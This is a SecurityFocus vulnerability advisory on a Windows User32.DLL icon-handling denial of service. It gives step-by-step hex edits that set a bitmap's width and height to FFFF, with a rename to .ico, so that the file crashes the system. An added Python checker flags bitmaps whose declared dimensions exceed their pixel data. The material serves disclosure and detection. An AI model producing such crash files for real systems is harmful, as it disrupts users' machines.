Microsoft Windows User32.DLL Icon Handling Denial Of Service Vulnerability

No exploit is required. The following example is available:

Just open a bitmap in a hex editor and modify the width and height data:

Locate the "XXXX" values...

----------------------------------------------------------------------------
00000000 : 424D 38F9 1500 0000 0000 3600 0000 2800 0000 XXXX
00000010 : 0000 XXXX 0000 0100 1800 0000 0000 02F9 1500 120B
----------------------------------------------------------------------------

...and change to:

----------------------------------------------------------------------------
00000000 : 424D 38F9 1500 0000 0000 3600 0000 2800 0000 FFFF
00000010 : 0000 FFFF 0000 0100 1800 0000 0000 02F9 1500 120B
----------------------------------------------------------------------------

Then change the extension to ".ico". Notice that the system will crash.
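A pre-screening check for the condition described above, as an added example that is not part of the original advisory: it parses the BMP file and info headers of a file (whatever its extension) and flags declared dimensions that the pixel data actually present cannot back. The function names, the constructed sample files and the choice to treat a mismatch as suspicious are assumptions of this example.

```python
import struct

# BITMAPFILEHEADER (14 bytes) + BITMAPINFOHEADER fields up to biCompression.
HDR = struct.Struct("<2sIHHIIiiHHI")

def check_bmp_dimensions(data: bytes) -> list:
    """Return findings for a BMP-format file; an empty list means plausible."""
    if len(data) < HDR.size:
        return ["truncated header"]
    (magic, _size, _r1, _r2, off_bits,
     _hdr_size, width, height, _planes, bpp, compression) = HDR.unpack_from(data)
    if magic != b"BM":
        return ["no 'BM' magic"]
    findings = []
    if width <= 0 or height == 0:
        findings.append(f"non-positive dimensions {width}x{height}")
    elif compression == 0:  # BI_RGB: pixel data size is fully determined
        stride = ((width * bpp + 31) // 32) * 4   # rows are padded to 4 bytes
        needed = stride * abs(height)             # negative height = top-down
        available = max(len(data) - off_bits, 0)
        if needed > available:
            findings.append(
                f"declared {width}x{abs(height)} at {bpp} bpp needs "
                f"{needed} bytes, file holds {available}")
    return findings

def make_bmp(width: int, height: int, pixels: bytes) -> bytes:
    """Build a constructed 24-bpp sample with the given declared dimensions."""
    off_bits = 54
    file_hdr = struct.pack("<2sIHHI", b"BM", off_bits + len(pixels), 0, 0, off_bits)
    info_hdr = struct.pack("<IiiHHIIiiII", 40, width, height, 1, 24, 0,
                           len(pixels), 0, 0, 0, 0)
    return file_hdr + info_hdr + pixels

# Constructed samples: a consistent 4x4 image, and the same pixel data with
# width and height set to 0xFFFF as in the hex dump above.
GOOD = make_bmp(4, 4, bytes(48))
BAD = make_bmp(0xFFFF, 0xFFFF, bytes(48))

if __name__ == "__main__":
    for name, blob in (("good", GOOD), ("bad", BAD)):
        print(name, check_bmp_dimensions(blob) or "ok")
```

The size comparison is applied only to uncompressed (BI_RGB) images, which is the case shown in the dump; compressed bitmaps need a separate bound.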


 

Copyright 2010, SecurityFocus